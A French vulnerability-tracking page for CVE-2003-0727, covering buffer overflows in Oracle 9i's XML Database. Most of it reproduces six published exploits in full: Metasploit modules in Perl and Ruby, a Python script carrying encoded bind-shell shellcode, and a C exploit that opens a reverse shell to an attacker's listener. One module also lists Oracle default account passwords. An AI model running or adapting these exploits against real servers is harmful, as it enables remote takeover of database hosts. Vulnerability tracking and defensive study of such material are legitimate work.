Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 1365
Date de publication : 2005-12-07 23h00 +00:00
Auteur : y0
EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8080],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
}),
'Refs' => [
['BID', '8375'],
['CVE', '2003-0727'],
['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
],
'DefaultTarget' => 0,
'Targets' => [
['Oracle 9.2.0.1 Universal', 0x60616d46],
],
'Keys' => ['oracle'],
'DisclosureDate' => 'Aug 18 2003',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("GET / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /9\.2\.0\.1\.0/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}
my $splat =
"meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
$self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;
my $sploit =
"GET / HTTP/1.1". "\r\n".
"Host: $target_host:$target_port". "\r\n".
"User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
"en-US; rv:1.7.12) Gecko/20050923". "\r\n".
"Accept: text/xml,application/xml,application".
"/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
"image/png,*/*;q=0.5". "\r\n".
"Accept-Language: en-us,en;q=0.5". "\r\n".
"Accept-Encoding: gzip,deflate". "\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
"Keep-Alive: 300". "\r\n".
"Connection: keep-alive". "\r\n".
"Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
"\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2005-12-08]
Exploit Database EDB-ID : 42780
Date de publication : 2017-09-24 22h00 +00:00
Auteur : Charles Dardaman
EDB Vérifié : No
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: 2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/
#!/usr/bin/python
import socket, sys, base64
#usage ./oracle9i_xbd_pass <target ip> <target port>
rhost = sys.argv[1] #target ip
rport = int(sys.argv[2]) #target port
#Variables:
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form
nop = "\x90"
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_nai
#355 bytes
payload = ""
payload += pre
payload += "\xba\x64\xdb\x93\xe7\xda\xd6\xd9\x74\x24\xf4\x58\x29"
payload += "\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"
payload += "\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"
payload += "\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"
payload += "\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"
payload += "\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"
payload += "\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"
payload += "\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"
payload += "\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"
payload += "\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"
payload += "\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"
payload += "\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"
payload += "\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"
payload += "\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"
payload += "\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"
payload += "\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"
payload += "\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"
payload += "\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"
payload += "\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"
payload += "\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"
payload += "\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"
payload += "\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"
payload += "\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"
payload += "\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"
payload += "\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"
payload += "\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"
payload += "\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"
payload += "\x98\xae\xd9\xba"
exploit = "AAAA:" + "B"*442 + "\xeb\x64" + (nop*2) + ret + (nop*266) +"\xeb\x10" + (nop*109) + payload + (nop * (400-len(payload)))
request = "GET / HTTP/1.1\r\n" + "Host: " + rhost + ":" + str(rport) + "\r\n" + "Authorization: Basic " + base64.b64encode(exploit) + "\r\n\r\n"
print ("Attacking " + rhost + ":" + str(rport))
#Connect to the target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,rport))
#Send exploit
s.send(request)
s.close()
print ("Try to connect on port 9989.")
Exploit Database EDB-ID : 80
Date de publication : 2003-08-12 22h00 +00:00
Auteur : David Litchfield
EDB Vérifié : Yes
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
unsigned char exploit[508]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
"\xFF\xFF\xFF\xFF";
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";
char exception_handler[8]="\x79\x9B\xf7\x77";
char short_jump[8]="\xEB\x06\x90\x90";
int main(int argc, char *argv[])
{
if(argc != 6)
{
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
printf("\n\n\tSpawns a reverse shell to specified port");
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
printf("\n\t6th July 2003\n\n\n");
return 0;
}
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.\n");
SetUpExploit(argv[4],atoi(argv[5]));
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"\r\n");
GainControlOfOracle(argv[2],argv[3]);
return 0;
}
int SetUpExploit(char *myip, int myport)
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";
ip = inet_addr(myip);
ipt = (char*)&ip;
exploit[191]=ipt[0];
exploit[192]=ipt[1];
exploit[193]=ipt[2];
exploit[194]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons((unsigned short)myport);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[209]=prtt[0];
exploit[210]=prtt[1];
return 0;
}
int StartWinsock() {
int err=0; WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return 0; }
if (isalpha(host[0])) {
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
he = (struct hostent *)1;
}
if (he == NULL) {
return 0; }
return 1; }
int GainControlOfOracle(char *user, char *pass) {
char usercmd[260]="user ";
char passcmd[260]="pass ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;
strncat(usercmd,user,230);
strcat(usercmd,"\r\n");
strncat(passcmd,pass,230);
strcat(passcmd,"\r\n");
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);
s_sa.sin_port=htons((unsigned short)2100);
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp); ZeroMemory(resp,1600);
snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{ closesocket(sock);
return printf("Failed to log in using user %s and password %s.\n",user,pass);
}
ZeroMemory(resp,1600);
snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
Exploit Database EDB-ID : 16731
Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',
'Description' => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2003-0727'],
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Platform' => 'win',
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
register_options([Opt::RPORT(2100),], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
user = rand_text_alpha_upper(10)
sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)
sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded
print_status("Trying target #{target.name}...")
send_cmd( ['USER', user], true )
send_cmd( ['PASS', sploit], false )
handler
disconnect
end
end
Exploit Database EDB-ID : 16714
Date de publication : 2010-10-04 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conference. Oracle9i includes a number of default accounts,
including dbsnmp:dbsmp, scott:tiger, system:manager, and
sys:change_on_install.
},
'Author' => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10559 $',
'Platform' => [ 'win' ],
'References' =>
[
[ 'CVE', '2003-0727'],
[ 'OSVDB', '2449'],
[ 'BID', '8375'],
[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Oracle 9.2.0.1 Universal',
{
'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)
},
],
],
'DisclosureDate' => 'Aug 18 2003',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(2100),
OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
], self.class )
end
def check
connect
disconnect
if (banner =~ /9\.2\.0\.1\.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Trying target #{target.name}...")
buf = rand_text_english(1130, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[322, seh.length] = seh
send_cmd( ['UNLOCK', '/', buf] , false )
handler
disconnect
end
end
Exploit Database EDB-ID : 16809
Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Description' => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2003-0727'],
['OSVDB', '2449'],
['BID', '8375'],
['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 18 2003'))
register_options(
[
Opt::RPORT(8080)
], self.class )
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
resp = sock.get_once
disconnect
if (resp =~ /9.2.0.1.0/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = rand_text_english(4, payload_badchars) + ":"
sploit << rand_text_english(442, payload_badchars)
sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded
req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"
res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req
print_status("Trying target %s..." % target.name)
sock.put(res)
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Oracle>>Database_server >> Version *
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version - (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 1.0.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.0 (Open CPE detail)
- Oracle>>Database_server >> Version 4.2.3 (Open CPE detail)
- Oracle>>Database_server >> Version 5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 7 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 7.0.64 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 7.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.3 (Open CPE detail)
- Oracle>>Database_server >> Version 7.3.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.5.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.0.6.3 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.6 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.0.0 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 8.1.7.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.1.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.2.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.5 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.6 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.7 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.0.8dv (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.1 (Open CPE detail)
- Oracle>>Database_server >> Version 9.2.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.3.1 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
- Oracle>>Database_server >> Version 10.1.0.4.2 (Open CPE detail)
